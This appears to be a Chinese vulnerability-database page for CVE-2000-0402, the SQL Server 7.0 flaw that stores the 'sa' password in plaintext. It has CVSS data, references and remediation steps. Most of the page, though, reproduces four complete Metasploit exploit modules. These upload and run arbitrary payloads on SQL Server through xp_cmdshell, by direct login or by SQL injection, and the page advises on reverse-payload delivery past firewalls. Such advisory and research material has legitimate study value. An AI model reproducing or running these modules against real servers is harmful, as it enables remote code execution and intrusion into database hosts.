CVE-2000-0402
CVSS2.1
发布时间 :2000-05-30 00:00:00
修订时间 :2008-09-10 15:04:35
NMCOEP    

[原文]The Mixed Mode authentication capability in Microsoft SQL Server 7.0 stores the System Administrator (sa) account in plaintext in a log file which is readable by any user, aka the "SQL Server 7.0 Service Pack Password" vulnerability.


[CNNVD]Microsoft SQL Server 7.0系统管理员密码泄露漏洞(CNNVD-200005-108)

        Microsoft SQL Server 7.0版本中Mixed Mode认证功能在任意用户可读的超长文件的明文中存储了系统管理员账户,又称为"SQL Server 7.0 Service Pack Password"漏洞。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:7.0:sp1Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:7.0:sp2Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0402
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0402
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-108
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms00-035.asp
(UNKNOWN)  MS  MS00-035
http://www.securityfocus.com/bid/1281
(UNKNOWN)  BID  1281
http://www.microsoft.com/technet/support/kb.asp?ID=263968
(UNKNOWN)  MSKB  Q263968

- 漏洞信息

Microsoft SQL Server 7.0系统管理员密码泄露漏洞
低危 设计错误
2000-05-30 00:00:00 2006-09-01 00:00:00
本地  
        Microsoft SQL Server 7.0版本中Mixed Mode认证功能在任意用户可读的超长文件的明文中存储了系统管理员账户,又称为"SQL Server 7.0 Service Pack Password"漏洞。

- 公告与补丁

        Microsoft has released a patch for Service Pack 2 and 3 which rectifies this issue. For those running Service Pack 1, search for SQLSP.LOG and SETUP.ISS and delete them. If Service Pack 1 is reinstalled, be sure to delete SQLSP.LOG and SETUP.ISS again and if Service Pack 2 is re-deployed, apply the patch again.
        Microsoft SQL Server 7.0 SP3
        
        Microsoft SQL Server 7.0
        

- 漏洞信息 (16394)

Microsoft SQL Server Payload Execution via SQL injection (EDBID:16394)
windows remote
2011-02-08 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mssql_payload_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

				In regard to the payload, unless there is a closed port in the web server,
				you dont want to use any "bind" payload, specially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoidied by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wcsript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11730 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This is method required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

		

- 漏洞信息 (16395)

Microsoft SQL Server Payload Execution (EDBID:16395)
windows remote
2010-12-21 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::MSSQL
	include Msf::Exploit::CmdStagerVBS
	#include Msf::Exploit::CmdStagerDebugAsm
	#include Msf::Exploit::CmdStagerDebugWrite
	#include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution',
			'Description'    => %q{
					This module executes an arbitrary payload on a Microsoft SQL Server by using
				the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoidied by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wcsript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.
			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck'  # command stager mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
			])
	end

	# This is method required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		if (not mssql_login_datastore)
			print_status("Invalid SQL Server credentials")
			return
		end

		method = datastore['METHOD'].downcase
		
		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end

		handler
		disconnect
	end

end
		

- 漏洞信息 (F97992)

Microsoft SQL Server Payload Execution via SQL injection (PacketStormID:F97992)
2011-01-29 00:00:00
Rodrigo Marcos,David Kennedy,jduck  metasploit.com
exploit,arbitrary,sql injection
CVE-2000-0402,CVE-2000-1209,OSVDB-15757
[点击下载]

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens.

##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

				In regard to the payload, unless there is a closed port in the web server,
				you dont want to use any "bind" payload, specially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoidied by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wcsript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This is method required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

    

- 漏洞信息 (F82979)

Microsoft SQL Server Payload Execution (PacketStormID:F82979)
2009-11-26 00:00:00
David Kennedy  metasploit.com
exploit,arbitrary
windows
CVE-2000-0402
[点击下载]

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::MSSQL
	def initialize(info = {})

		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using the Windows debug.com method for writing an executable to disk
				and the xp_cmdshell stored procedure. File size restrictions are avoided by 
				incorporating the debug	bypass method presented at Defcon 17 by SecureState.
				Note that this module will leave a metasploit payload in the Windows
				System32 directory which must be manually deleted once the attack is completed.
			},
			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '557'],
					[ 'CVE', '2000-0402'],
					[ 'BID', '1281'],
					[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0 
			))
	end

	def exploit
		
		debug = false # enable to see the output
		
		if(not mssql_login_datastore) 
			print_status("Invalid SQL Server credentials")
			return
		end
		
		mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)

		handler
		disconnect
	end
end
    

- 漏洞信息

557
MS-SQL Passwordless Admin Account

- 漏洞描述

Microsoft SQL Server versions 7 and 2000, along with Microsoft Data Engine (MSDE), by default installs an admin account ('sa') with a blank or null password. Using this account, it is possible for an intruder to modify and delete information stored in the database and may be able to run commands at the operating system level through the xp_cmdshell stored procedure.

- 时间线

2000-05-30 Unknow
Unknow Unknow

- 解决方案

Change the password for the 'sa' account, or switch to Domain Authentication mode for this server. To change the 'sa' account password on an MSSQL 7.0 Server, perform the following steps (these steps should be fairly similar on different versions of MSSQL Server): 1. Click Start -> Programs -> Microsoft SQL Server -> Enterprise Manager 2. Expand 'Console Root' (click on the plus (+) symbol to the left of 'Console Root'). 3. Expand 'Microsoft SQL Servers'. 4. Expand 'SQL Server Group'. 5. Double click the name of the affected SQL server. 6. Double click 'Security'. 7. In the right-hand pane, double click on 'Logins'. 8. Right click on 'sa' and select 'Properties'. 9. Click the 'General' tab. 10. Under 'SQL Server Authentication', enter your password of choice and click 'OK'. 11. Enter password again in the 'Confirm Password' popup window. 12. Exit Enterprise Manager.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站